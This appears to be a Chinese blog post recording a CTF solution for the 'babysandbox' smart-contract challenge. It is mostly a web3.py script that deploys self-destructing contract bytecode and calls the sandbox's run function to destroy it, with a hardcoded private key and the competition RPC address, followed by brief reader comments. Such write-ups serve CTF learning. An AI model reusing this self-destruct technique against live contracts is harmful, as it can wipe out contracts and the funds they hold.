默认分类

记录web3py模板的一个题

第五空间 babysandbox

手速快 拿了个一血。 由于是私链题盛行,这里记录下exp吧。 题目就是Paradigm-CTF 的babysandbox 很简单,可以看我的分析

import web3
from web3 import Web3,HTTPProvider
from web3.auto import w3
import hashlib
import json
from Crypto.Util.number import *
web3=Web3(HTTPProvider("http://114.115.157.63:8545/"))
acct=web3.eth.account.from_key(\'0x107601f7600411eb7203286cf0c83aa4f18b336196c3c98a33dcbb3a49d89a3d\')
"""abi=[
    {
        "stateMutability": "payable",
        "type": "fallback"
    }
]
opcode="6080604052348015600f57600080fd5b50605380601d6000396000f3fe60806040523273ffffffffffffffffffffffffffffffffffffffff16fffea2646970667358221220905d81ab00e22c4df5b3b4a0e06c36d582af1c1bda479c1f5d52b953fc13617064736f6c63430007000033"
contract=web3.eth.contract(abi=abi,bytecode=opcode)
construct_txn = contract.constructor().buildTransaction({
\'from\': acct.address,
\'nonce\': web3.eth.getTransactionCount(acct.address),
\'gas\': 5000000,
\'gasPrice\': web3.toWei(\'21\', \'gwei\')})
signed=acct.signTransaction(construct_txn)
tx_id=web3.eth.sendRawTransaction(signed.rawTransaction)
print(tx_id.hex())"""
#print(web3.eth.getTransactionReceipt(\'0xb04cf1ce18efe0007088ac00792d2c0fd2e159c156ab68eca5890edc2fd23d73\'))
# address2 : 0xcaF2f0A364B8D23787F63ed98590F65970b4C50b
abi2=[
    {
        "inputs": [],
        "stateMutability": "nonpayable",
        "type": "constructor"
    },
    {
        "stateMutability": "payable",
        "type": "fallback"
    }
]
"""opcode="6080604052348015600f57600080fd5b5060838061001e6000396000f3fe6080604052600073caf2f0a364b8d23787f63ed98590f65970b4c50b6000806000806000855af19150508060325750604b565b3273ffffffffffffffffffffffffffffffffffffffff16ff5b00fea2646970667358221220cb8975fb237c4082d510ddec3bb377bd61c129f2794dfd25052e44f3c930257064736f6c63430007000033"
contract=web3.eth.contract(abi=abi2,bytecode=opcode)
construct_txn = contract.constructor().buildTransaction({
\'from\': acct.address,
\'nonce\': web3.eth.getTransactionCount(acct.address),
\'gas\': 5000000,
\'gasPrice\': web3.toWei(\'21\', \'gwei\')})
signed=acct.signTransaction(construct_txn)
tx_id=web3.eth.sendRawTransaction(signed.rawTransaction)
import time
time.sleep(2)
print(web3.eth.getTransactionReceipt(tx_id))
"""
#print(web3.eth.getTransactionReceipt(\'0xbb5d4dd2462e3a808fb3d52aabd8defe0472041971e6eec4b753417d0c4ce5dc\'))
# address 1 = 0xeeFDEed9E7A39965a397De6bbe31dfb314525b06
def get_txn(src, dst, datad,nonce, value=0, ):
    return {
        "from": src,
        "to": dst,
        "gasPrice":  web3.toWei(1,\'gwei\'),
        "gas": 3000000,
        "value":  web3.toWei(value,\'wei\'),
        "nonce":  nonce,#web3.eth.getTransactionCount(src),
        "data": datad,
         \'chainId\':8888
    }
"""to_addr=\'0x9d629baE007F1B454A46fc03FA5FDedB335e5B18\'
data=long_to_bytes(0xc24fe950000000000000000000000000eeFDEed9E7A39965a397De6bbe31dfb314525b06)
nonce=web3.eth.getTransactionCount(acct.address)
signed_txn = web3.eth.account.signTransaction(get_txn(acct.address, to_addr, data, nonce), acct.privateKey)
txn_hash = web3.eth.sendRawTransaction(signed_txn.rawTransaction).hex()
print("hack"+txn_hash)"""
print(web3.eth.getTransactionReceipt(\'0xc3de56cb62b665191cbc640b6a7a68ffa1d7c22e6aa4f577d0e1bc1d419c3827\'))
#print(web3.eth.getTransactionReceipt(\'0x9ed9c7f8899040de1f54fe911b27474c56b9f4f9e17374fe552e40bbe96c9f70\'))

回复

  1. zbr zbr
    Chrome 95 10

    好好好

  2. Bubble Bubble
    Chrome 95 10

    好好好

  3. zbr zbr
    Chrome 95 10

    坏坏坏

This is just a placeholder img.